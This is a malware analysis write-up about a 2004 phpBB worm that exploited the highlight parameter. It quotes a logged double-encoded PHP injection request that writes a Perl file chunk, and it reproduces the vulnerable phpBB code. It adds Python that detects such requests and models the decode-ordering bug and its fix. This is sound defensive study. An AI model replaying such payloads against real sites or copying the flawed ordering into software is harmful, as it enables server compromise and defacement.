by Javantea aka. Joel R. Voss
Analysis: Dec 20, 2004
Write-up: Sept 8, 2006
Botnets
The first Linux/Apache worm was quite recent (Dec 20, 2004), targeting a vulnerability in phpBB which was caused by PHP. The worm used Perl, Google, and left an obvious trace. Although it did not become a botnet, it easily could have. It was a worm and had a payload that deleted many files and replaced them with a banner. This is known as a delete files + hello world payload.
On Dec 20, 2004, Shannon Lee (shannon webhostworks net) reported to Bugtraq that a phpBB worm had been spreading [1]. She reported that the worm defaced pages with "NeverEverNoSanity WebWorm Generation 9". The number is actually a counter of the generations of the worm (Generation 1 would be the initial attacker, Generation 2 would be the initial attacker's targets, and so on). The worm used the highlight bug in phpBB, which allows execution of arbitrary PHP code [2].
The virus transfers itself in a series of requests, each of which appends around 19 bytes to the file it is building on the target.
64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET /viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITEOMITTED.com/viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
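The access-log entry above is the kind of line an administrator would have had to recognise by hand in 2004. As an added illustration (my own code, not part of the original write-up), the following Python triage routine picks the highlight= parameter out of Apache combined-format lines, notices when a second URL decode still changes the value (the %25-prefixed double encoding visible in the log), flags PHP function names in the decoded text, and renders every chr(n).chr(m)... run into the literal it builds so an analyst can read what the request actually wrote. The sample log lines are constructed; the worm line is the request from the log above with its session id shortened.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines: one ordinary search, one modelled on the
# worm request quoted in the write-up (sid shortened, referer and agent dropped).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Dec/2004:08:40:01 -0800] '
    '"GET /viewtopic.php?t=12&highlight=perl+worm HTTP/1.1" 200 9321',
    '64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] '
    '"GET /viewtopic.php?p=9002&sid=f5399a2d&highlight=%2527%252Efwrite(fopen('
    'chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)'
    '%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)'
    '%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)'
    '%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)'
    '%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)'
    '%252echr(32)),exit%252e%2527 HTTP/1.0" 200 13648',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A run of chr(n) calls joined by '.', i.e. one PHP string built character by character.
CHR_RUN_RE = re.compile(r'chr\(\d+\)(?:\.chr\(\d+\))*')
CHR_RE = re.compile(r'chr\((\d+)\)')
# PHP calls that have no business in a forum search term.
PHP_CALLS = ('fwrite(', 'fopen(', 'chr(')


def highlight_param(line):
    """Return the highlight= value after the single decode the web server
    and PHP perform, or None when the line carries no such parameter."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group('target')).query
    values = parse_qs(query, keep_blank_values=True).get('highlight')
    return values[0] if values else None


def render_chr_runs(php_text):
    """Collapse each chr(n).chr(m)... run into the string it evaluates to."""
    return [''.join(chr(int(n)) for n in CHR_RE.findall(run.group(0)))
            for run in CHR_RUN_RE.finditer(php_text)]


def triage(line):
    """Decode the parameter a second time (what phpBB's urldecode() did) and
    report whether that changed anything, which PHP calls appear, and the
    literal strings the chr() runs spell out."""
    value = highlight_param(line)
    if value is None:
        return {'highlight': None, 'double_encoded': False,
                'php_calls': [], 'strings': []}
    decoded_again = unquote_plus(value)
    return {
        'highlight': decoded_again,
        # A second decode only changes a value that was %25-encoded on the wire.
        'double_encoded': decoded_again != value,
        'php_calls': [c for c in PHP_CALLS if c in decoded_again],
        'strings': render_chr_runs(decoded_again),
    }


def suspicious(line):
    """Alert rule: double encoding or PHP function calls in a search term."""
    t = triage(line)
    return t['double_encoded'] or bool(t['php_calls'])


if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(suspicious(entry), triage(entry))
```

Run against the worm line, the three rendered strings are the file name opened, the fopen() mode, and the chunk appended by that request; the double-encoding check alone is enough to flag the line, because a legitimate search term never needs a second decode.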
phpBB Vulnerable Code:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
    // Split words and phrases
    // $HTTP_GET_VARS is already URL-decoded once by PHP; calling urldecode()
    // on it AFTER htmlspecialchars() means a double-encoded value (%2527)
    // is escaped as harmless "%27" and only then turned into a quote.
    $words = explode(' ', trim(urldecode(htmlspecialchars($HTTP_GET_VARS['highlight']))));
    for($i = 0; $i < sizeof($words); $i++)
    {
        if (trim($words[$i]) != '')
        {
            $highlight_match .= (($highlight_match != '') ? '|' : '') . str_replace('*', '\w*', phpbb_preg_quote($words[$i], '#'));
        }
    }
    unset($words);
    $highlight = urlencode($HTTP_GET_VARS['highlight']);
}

//
// This does exactly what preg_quote() does in PHP 4-ish
// If you just need the 1-parameter preg_quote call, then don't bother using this.
//
function phpbb_preg_quote($str, $delimiter)
{
    $text = preg_quote($str);
    $text = str_replace($delimiter, '\\' . $delimiter, $text);
    return $text;
}
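The defect in the code above is one of ordering: htmlspecialchars() inspects the value as PHP delivered it, and urldecode() then produces characters the escaper never saw. To make that concrete, here is an added Python model of the highlight handling (my own code, not phpBB's); it mirrors the page's steps, with decode_twice=True reproducing the vulnerable order and decode_twice=False the obvious hardening of not decoding a second time after escaping. The PHP helpers are approximations: php_htmlspecialchars() uses the PHP 4 default flag set (& < > " only), and phpbb_preg_quote() escapes the characters preg_quote() handles plus the '#' delimiter, as the page's function does.

```python
from urllib.parse import unquote_plus


def php_htmlspecialchars(s):
    """htmlspecialchars() with PHP 4's default flags (ENT_COMPAT): & < > " only.
    Note the single quote is left alone, as it was in PHP 4."""
    return (s.replace('&', '&amp;').replace('<', '&lt;')
             .replace('>', '&gt;').replace('"', '&quot;'))


# Characters preg_quote() backslash-escapes (approximation of PHP 4/5 behaviour).
_PREG_SPECIAL = set(r'.\+*?[^]$(){}=!<>|:-')


def phpbb_preg_quote(s, delimiter):
    """Mirror of the page's phpbb_preg_quote(): preg_quote() plus the delimiter."""
    return ''.join('\\' + c if (c in _PREG_SPECIAL or c == delimiter) else c
                   for c in s)


def highlight_match(wire_value, decode_twice=True):
    """Rebuild $highlight_match from the highlight= value as sent on the wire.

    decode_twice=True  : the page's order, htmlspecialchars() then urldecode().
    decode_twice=False : hardened order, no second decode after escaping.
    """
    # PHP's own single decode into $HTTP_GET_VARS ('+' becomes a space).
    get_var = unquote_plus(wire_value)
    escaped = php_htmlspecialchars(get_var)
    text = unquote_plus(escaped) if decode_twice else escaped
    words = [w for w in text.strip().split(' ') if w.strip() != '']
    # str_replace('*', '\w*', ...) applied to the quoted word, as on the page.
    return '|'.join(phpbb_preg_quote(w, '#').replace('*', r'\w*') for w in words)


def smuggled(wire_value):
    """Characters that reach $highlight_match only because of the second decode."""
    vuln = highlight_match(wire_value, decode_twice=True)
    hard = highlight_match(wire_value, decode_twice=False)
    return sorted(set(vuln) - set(hard))


if __name__ == '__main__':
    for v in ('alpha+beta', '%3Cb%3E', '%253Cb%253E', '%2527'):
        print(repr(v), '->', repr(highlight_match(v)),
              '| hardened:', repr(highlight_match(v, decode_twice=False)))
```

A single-encoded %3C is turned into &lt; and stays that way in both orders, but the double-encoded %253C reaches the escaper as the harmless text "%3C" and only becomes "<" afterwards; the same path turns %2527 into a bare quote, which is the character the worm's request above smuggles into the string phpBB later evaluates. Dropping the second decode makes the two orders agree and removes the bypass.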
Virus Code:
Unfinished.
1) Lee, Shannon. "phpbb worm." URL: http://www.securityfocus.com/archive/1/385063 Dec 20, 2004
2) psoTFX. "howdark.com exploits - follow up." URL: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 Nov 18, 2004
3) Hoffman, Billy. "Analysis of Web Application Worms and Viruses." URL: http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Hoffman/BH-Fed-06-Hoffman-up.pdf#search=%22phpbb%20worm%20analysis%22